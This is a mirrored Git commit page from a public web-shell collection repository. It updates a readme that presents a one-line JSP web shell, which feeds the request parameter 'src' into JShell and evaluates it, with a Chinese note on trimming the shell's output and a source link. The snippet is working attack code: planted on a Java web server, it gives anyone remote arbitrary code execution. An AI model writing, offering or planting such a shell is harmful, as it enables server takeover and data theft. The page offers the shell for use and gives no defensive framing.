mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Update readme.md
This commit is contained in:
parent
3d0824a806
commit
5c2f32773f
1 changed files with 4 additions and 1 deletions
|
@ -6,5 +6,8 @@ readme
|
||||||
|
|
||||||
如果强迫症想撸掉多余的输出:
|
如果强迫症想撸掉多余的输出:
|
||||||
|
|
||||||
|
```
|
||||||
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
|
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
|
||||||
|
```
|
||||||
|
|
||||||
|
from: http://p2j.cn/?p=1874
|
||||||
|
|
Loading…
Reference in a new issue